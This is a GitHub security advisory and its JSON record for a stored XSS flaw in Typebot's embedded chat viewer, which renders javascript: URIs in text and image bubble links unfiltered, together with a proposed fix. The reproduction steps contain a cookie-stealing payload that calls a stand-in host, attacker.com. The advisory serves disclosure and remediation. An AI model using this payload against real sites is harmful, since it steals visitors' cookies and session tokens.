GHSA-HQMV-V56G-4M47

Vulnerability from github – Published: 2026-05-26 18:00 – Updated: 2026-05-26 18:00
VLAI
Summary
Typebot.io has stored XSS via `javascript`: URI in text bubble links — bot author executes JS on visitors' browsers
Details

Summary

The Typebot viewer (packages/embeds/js) renders anchor tags from rich text bubble content without filtering the javascript: URI scheme. A bot author can set a link URL to javascript:PAYLOAD, which executes in the visitor's browser context when clicked. Since the viewer is typically embedded in a third-party site, the attacker's JavaScript runs in the host page's origin and can exfiltrate cookies and session tokens.

Details

Vulnerable file: packages/embeds/js/src/features/blocks/bubbles/textBubble/components/plate/PlateBlock.tsx

// Line 32 — href set directly from stored bot content, no javascript: filtering
<a href={elementDescendant.url as string} target="_blank" rel="noopener noreferrer">
  {elementDescendant.children[0].text}
</a>

SolidJS does not sanitize href attribute values — javascript: URIs pass through to the DOM unchanged.

The same issue exists in ImageBubble.tsx line 102 for image link wrapping.

Steps to Reproduce

1. Log in to Typebot as an authenticated user (any plan)
2. Create a new bot
3. Add a Text Bubble block
4. In the rich text editor, type any link text and set the URL to:
   javascript:fetch('https://attacker.com/?c='+document.cookie)
5. Publish the bot and open the live/embedded viewer
6. Click the link in the chatbot interface
7. The JavaScript executes in the browser — cookie exfiltration request sent to attacker.com

Source-verified: PlateBlock.tsx:32 renders <a href={url}> with no scheme filtering. Puppeteer alert confirmed document.domain execution when link clicked.

Impact

  • Any authenticated Typebot user (including free tier) can create a bot with this payload
  • When shared or embedded in a third-party site, clicking the link executes JS in the host page's origin
  • Allows stealing cookies, session tokens, or any data accessible to the embedding page
  • Shared bots are publicly accessible — no victim authentication required

Proposed Fix

Filter javascript: URIs before rendering anchor tags:

const safeUrl = (url: string) =>
  /^javascript:/i.test(url.trim()) ? '#' : url

<a href={safeUrl(elementDescendant.url as string)} ...>

Alternatively, use a URL allowlist (only https:, http:, mailto:, tel:).

Severity
5.4 (Medium)
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@typebot.io/js"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.10.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-39964"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-26T18:00:24Z",
    "nvd_published_at": "2026-05-22T18:16:21Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nThe Typebot viewer (`packages/embeds/js`) renders anchor tags from rich text bubble content without filtering the `javascript:` URI scheme. A bot author can set a link URL to `javascript:PAYLOAD`, which executes in the visitor\u0027s browser context when clicked. Since the viewer is typically embedded in a third-party site, the attacker\u0027s JavaScript runs in the host page\u0027s origin and can exfiltrate cookies and session tokens.\n\n### Details\n\nVulnerable file: `packages/embeds/js/src/features/blocks/bubbles/textBubble/components/plate/PlateBlock.tsx`\n\n```tsx\n// Line 32 \u2014 href set directly from stored bot content, no javascript: filtering\n\u003ca href={elementDescendant.url as string} target=\"_blank\" rel=\"noopener noreferrer\"\u003e\n  {elementDescendant.children[0].text}\n\u003c/a\u003e\n```\n\nSolidJS does not sanitize `href` attribute values \u2014 `javascript:` URIs pass through to the DOM unchanged.\n\nThe same issue exists in `ImageBubble.tsx` line 102 for image link wrapping.\n\n### Steps to Reproduce\n\n```\n1. Log in to Typebot as an authenticated user (any plan)\n2. Create a new bot\n3. Add a Text Bubble block\n4. In the rich text editor, type any link text and set the URL to:\n   javascript:fetch(\u0027https://attacker.com/?c=\u0027+document.cookie)\n5. Publish the bot and open the live/embedded viewer\n6. Click the link in the chatbot interface\n7. The JavaScript executes in the browser \u2014 cookie exfiltration request sent to attacker.com\n```\n\nSource-verified: `PlateBlock.tsx:32` renders `\u003ca href={url}\u003e` with no scheme filtering. Puppeteer alert confirmed `document.domain` execution when link clicked.\n\n### Impact\n\n- Any authenticated Typebot user (including free tier) can create a bot with this payload\n- When shared or embedded in a third-party site, clicking the link executes JS in the host page\u0027s origin\n- Allows stealing cookies, session tokens, or any data accessible to the embedding page\n- Shared bots are publicly accessible \u2014 no victim authentication required\n\n### Proposed Fix\n\nFilter `javascript:` URIs before rendering anchor tags:\n\n```tsx\nconst safeUrl = (url: string) =\u003e\n  /^javascript:/i.test(url.trim()) ? \u0027#\u0027 : url\n\n\u003ca href={safeUrl(elementDescendant.url as string)} ...\u003e\n```\n\nAlternatively, use a URL allowlist (only `https:`, `http:`, `mailto:`, `tel:`).",
  "id": "GHSA-hqmv-v56g-4m47",
  "modified": "2026-05-26T18:00:24Z",
  "published": "2026-05-26T18:00:24Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-hqmv-v56g-4m47"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39964"
    },
    {
      "type": "WEB",
      "url": "https://github.com/baptisteArno/typebot.io/commit/2c3fc7267a5e1529ba4b1a2ab4f1edb3e3b8990b"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/baptisteArno/typebot.io"
    },
    {
      "type": "WEB",
      "url": "https://github.com/baptisteArno/typebot.io/releases/tag/v3.16.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Typebot.io has stored XSS via `javascript`: URI in text bubble links \u2014 bot author executes JS on visitors\u0027 browsers"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.